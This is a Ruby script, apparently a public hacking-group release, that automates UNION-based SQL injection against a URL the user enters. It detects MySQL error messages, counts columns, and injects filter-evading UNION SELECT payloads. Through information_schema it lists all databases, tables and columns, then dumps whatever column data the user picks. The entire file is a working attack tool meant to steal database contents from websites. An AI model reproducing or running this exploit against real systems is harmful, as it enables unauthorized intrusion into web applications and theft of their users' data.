UNION-Based (Basic) SQL Injection auto exploit v 0.2

#!/user/bin/ruby
require'open-uri'
=begin
Auto Sql Injection Exploiter
By Hamza Killer xD :D
To Sec4ever && s3ck.net
TO : Uzun-Dz , R0x , Black-id xD
This tools is public_version inject union based (intiger and string)
the priv8 tools inject blind sql && union based && error based
xD soon it will be public xD
my eng khkhkhk
=end
### Homee Functiop
class String
def red;            "\033[31m#{self}\033[0m" end
def green;          "\033[32m#{self}\033[0m" end
def  brown;         "\033[33m#{self}\033[0m" end
def gray;           "\033[37m#{self}\033[0m" end
def bg_red;         "\033[41m#{self}\033[0m" end
def bg_green;       "\033[42m#{self}\033[0m" end
def bg_brown;       "\033[43m#{self}\033[0m" end
def bg_blue;        "\033[44m#{self}\033[0m" end
def bg_magenta;     "\033[45m#{self}\033[0m" end
def bg_cyan;        "\033[46m#{self}\033[0m" end
def bg_gray;        "\033[47m#{self}\033[0m" end
end
def home()
text=[
 "   [*]=========================================[*]",
 "   [*]     Auto Sql Injection Exploit V 1.0    [*]",
 "   [*]       H A M Z A    K I L L E R          [*]",
 "   [*]        Hlyzidi[at]gmail[dot]com         [*]",
 "   [*]=========================================[*]"
  ]
for oo in text
puts oo.red
sleep(0.1)
end
end
## function for get body_url
def get_con(url)
f = open(url)
x=f.readlines.join
return x
end
## Function for parcing url for handling Error
def url_x(url)
if(url =~ /http:\/\//)
url=URI(url)
elsif (url =~ /https:\/\//)
puts "Tool NOt work with ssl sorry "
exit
else
url=URI("http://#{url}")
end
end
## function for chek url if he is infected
def infected_1(url)
x=get_con(url)
if (x=~ /Unknown column/i || x=~ /on line/i ||  x=~ /Warning MySQL/i||  x=~ /You have an error in your SQL syntax/i||  x=~/Warning MySQL/i ||  x=~/Warning: mysql_num_rows():/i)
return true
end
end
## Function for Get All Database
def get_all_data(url,clm,pay)
xssp="#{url}#{pay}"
payload="/*!12345GrouP_CoNcaT(5*5,SchEmA_NamE,10*30)*/"
begin
xuxrl=pay.sub("#{clm}","#{payload}")
xurl=URI("#{url}#{xuxrl}+FroM+iNForMaTion_SchEmA.SchEmAta--+-")
rescue
print "some thing Wrong"
end
xd=get_con(xurl)
data=xd.scan(/25(.*?)300/i)
for dat in data.uniq
p=dat[0].sub(",","");
puts "|| [+] #{p}"
end
end
## function for stik union
def url_pasq(ur,col)
p=ur.sub("=","=-");
po="+/*!12345UNION*/+/*!12345SELECT*/+1";
while (i=2 < col)
i=2+1
pppp="#{p}#{po}+,#{i}--+-"
return pppp
end
end
##################################################""

def get_data(url,clm,pay)
payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,database(),0x2f3a3a2f,version(),0x2f3a3a2f,user(),0x68616d7a6178647a)*/"
xuxrl=pay.sub("#{clm}","#{payload}")
xurl=URI("#{url}#{xuxrl}")
xd=get_con(xurl)
data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i)
begin
for dat in data[0]
xd=dat.split("/::/")
database=xd[0]
version=xd[1]
user=xd[2]
puts "[+] Db server user   :#{user} ".green
puts "[+] Database version : #{version} ".green
puts "[+] current Database : #{database}".green
end
end
rescue
puts "Error !!!!!"
end
### Function for Hex Encoding
def hex_string(url,clm,pay,xstring)
xssp="#{url}#{pay}"
payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,%270x%27,HEX(%27#{xstring}%27),0x68616d7a6178647a)*/"
xuxrl=pay.sub("#{clm}","#{payload}")
xurl=URI("#{url}#{xuxrl}+--")
xd=get_con(xurl)
data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i)
for dat in data.uniq
return dat[0]
end
end
##### Function For Get All tables
def get_all_tables(url,clm,pay,db)
xssp="#{url}#{pay}"
payload="/*!12345GrouP_CoNcaT(5*5,table_name,6*5)*/"
xuxrl=pay.sub("#{clm}","#{payload}")
xurl=URI("#{url}#{xuxrl}+from+information_schema.tables+where+table_schema=#{db}--+-")
xd=get_con(xurl)
data=xd.scan(/25(.*?)30/i)
for dats in data.uniq
for dat in dats
p=dat.sub(",","");
puts "|| [+] #{p}".brown
end
end
end
####### Function For Get All colum
def get_all_clum(url,clm,pay,db,table)
xssp="#{url}#{pay}"
payload="/*!12345GrouP_CoNcaT(5*5,column_name,6*5)*/"
xuxrl=pay.sub("#{clm}","#{payload}")
xurl=URI("#{url}#{xuxrl}+FROM+INFORMATION_ScheMa./*!columNs*/+WhErE+tablE_scheMa=#{db}+and+table_name=#{table}--+-")
xd=get_con(xurl)
data=xd.scan(/25(.*?)30/i)
for dat in data.uniq
p=dat[0].sub(",","");
puts "[+] #{p}".green
end
end
######## Finily GEt All Data
def get_all_data_bitch(url,clm,pay,db,table,colm)
xssp="#{url}#{pay}"
payload="/*!12345GrouP_CoNcaT(5*5,#{colm},6*5)*/"
xuxrl=pay.sub("#{clm}","#{payload}")
xurl=URI("#{url}#{xuxrl}+FroM+#{db}.#{table}--+-")
xd=get_con(xurl)
data=xd.scan(/25(.*?)30/i)
for dat in data.uniq
p=dat[0].sub(",","");
puts "[+] #{p}"
end
end
#########################################################
#########################################################
###################    Chek if vul    ###################
home()
print("# Eenter Url ->")
begin
urld=gets.chomp
if !(urld)
print "# Error !!!!!!!!!"
exit
end
url=url_x(urld)
x=infected_1("#{url}'")
rescue
print "# Error !!!!!!!!!\n"
exit
end
if(x)
print"[+] #{url} => SQl Injection Found\n".bg_blue
print"[+] injection type is Integer\n".bg_blue
else
puts"[-] try to inject string ".bg_cyan
end
#########################################
def get_col2(url)
pd=URI(url)
xss=get_con(pd)
for i in 1..50
urls=URI("#{url}+Order+by+#{i}--+-")
xs=get_con(urls)
if (xs == xss)
clnb=i-1;
break
end
end
return clnb
end
#### Get column Infected
for i in 1..50
urls=URI("#{url}+Order+by+#{i}--+-")
x=get_con(urls)
if (x=~ /Unknown column/i || x=~ /on line/i ||  x=~ /Warning MySQL/i||  x=~ /You have an error in your SQL syntax/i||  x=~/Warning MySQL/i ||  x=~/Warning: mysql_num_rows():/i||  x=~/in 'order clause'/i)
clnb=i-1;
clnbs=i-1;

break
sleep(0.2)
end
end
####
####
print"[+] number : #{clnb}\n".bg_blue
#### NOw GEt Infected columns
print"[+] Searching for infected columns ...........\n".bg_red
p=urld.sub("=","=-");
po="+/*!12345UNION*/+/*!12345SELECT*/+";
all_url="#{p}#{po}"
dz=[]
begin
clnb=clnb
for i in (2..clnb).to_a
dz.push(i)
sleep(0.00003)
end
rescue
clnb=get_col2(url)
for i in (2..clnb).to_a
dz.push(i)
sleep(0.00003)
end
rescue
print "Error xD :D !!!!!".bg_red
exit
end
clm_num=dz.join(",")
clm_num="1,#{clm_num}"
x_clminf="#{all_url}#{clm_num}--"
for ix in (1..clnb)
xpx=clm_num.sub("#{ix}",'0x68616d7a6178647a');
ppps=URI("#{all_url}#{xpx}--")
x_url=get_con(ppps)
if(x_url =~ /hamzaxdz/i)
p_ss=ix
break
end
sleep(0.00003)
end
puts "[+] Found infected columns is : #{p_ss}".bg_brown
# print All information
get_data(all_url,p_ss,clm_num)
# GET All Database
into=["||==================================================||",
      "||===========        databases           ===========||",
      "||==================================================||"]
xbar=["||==================================================||"]
for ine in into
puts ine
sleep(0.2)
end
get_all_data(all_url,p_ss,clm_num)
for ine in xbar
puts ine
sleep(1)
end
print('# PLZ chois Database :')
data_user=gets.chomp
## Now Select Database And Fuck It
database_hex=hex_string(all_url,p_ss,clm_num,data_user) ## Database Hex_encode
## Now Extreact Tables
into=["||==================================================||",
      "||===========          Tables            ===========||",
      "||==================================================||"]
for ine in into
puts ine
sleep(0.2)
end
get_all_tables(all_url,p_ss,clm_num,database_hex)
for ine in xbar
puts ine
sleep(1)
end
print('# PLZ Enter Table :')
tab_user=gets.chomp
table_hex=hex_string(all_url,p_ss,clm_num,tab_user)### Hexing This Fuck xD
into=["||==================================================||",
      "||===========          columns           ===========||",
      "||==================================================||"]
for ine in into
puts ine
sleep(0.2)
end
get_all_clum(all_url,p_ss,clm_num,database_hex,table_hex)
for ine in xbar
puts ine
sleep(1)
end
### Now Bitch Start Work And Get All Data Fuck Fuck Zhhhhh:D
a=true
while a
print "# Enter columns ->"
clm=gets.chomp
begin
get_all_data_bitch(all_url,p_ss,clm_num,data_user,tab_user,clm)
rescue
print "Error !!!!!!\n"
end
end